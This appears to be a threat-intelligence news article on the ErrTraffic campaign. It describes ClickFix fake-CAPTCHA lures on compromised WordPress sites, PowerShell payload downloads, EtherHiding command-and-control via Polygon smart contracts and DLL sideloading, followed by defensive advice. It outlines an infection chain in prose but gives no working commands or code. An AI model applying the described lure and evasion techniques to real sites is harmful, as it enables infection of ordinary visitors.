A newly observed malware campaign named ErrTraffic is using ClickFix lures on compromised WordPress sites to trick visitors into executing harmful PowerShell commands, according to analysis from Sekoia research. The activity was first detected in mid-June 2026 and has been linked to the threat actors LenAI and Rapid Brigantine.
Attackers inject malicious JavaScript into the compromised pages, which presents a fake CAPTCHA prompt to the visitor, as detailed in a write‑up by SecurityOnline here. When the user follows the instruction, a PowerShell command is executed that downloads a payload from an attacker‑controlled server. The command and control channel leverages EtherHiding, storing encrypted cues in smart contracts on the Polygon blockchain to evade traditional detection.
The payload employs DLL sideloading techniques to load an encrypted malicious module into legitimate processes, a tactic highlighted in BlueVoyant’s analysis of the campaign. ErrTraffic is offered as a Malware‑as‑a‑Service, with LenAI handling subscriptions and periodically raising the price for access. Subscribers receive updates that refine the infection chain and add new obfuscation layers.
The campaign appears to be an evolution of the earlier Lorem Ipsum malware, which previously relied on Trojanised Microsoft Teams installers, as reported by DarkReading here. After Microsoft disrupted a malware‑signing service, the operators shifted to ClickFix lures on WordPress to broaden their reach. BlueVoyant analysts associate this shift with the Rapid Brigantine group, known for ties to several ransomware families. By using compromised websites, the threat actors can infect anyone who browses the site, not just users of a specific software.
Defenders should enable detailed PowerShell logging and monitor for suspicious script execution originating from browsers. Regularly auditing WordPress plugins, themes and core files for unauthorised JavaScript helps identify the injection point early. Enforcing strong, unique authentication for admin accounts reduces the likelihood of initial compromise. Additionally, watching for outbound connections to Polygon contract addresses can reveal the EtherHiding C2 mechanism.
Keeping WordPress installations up to date and deploying a web application firewall can block many injection attempts. Educating users to recognise that legitimate CAPTCHA widgets never ask them to run PowerShell commands reduces the success rate of social engineering lures. Network segmentation limits lateral movement if a workstation becomes infected.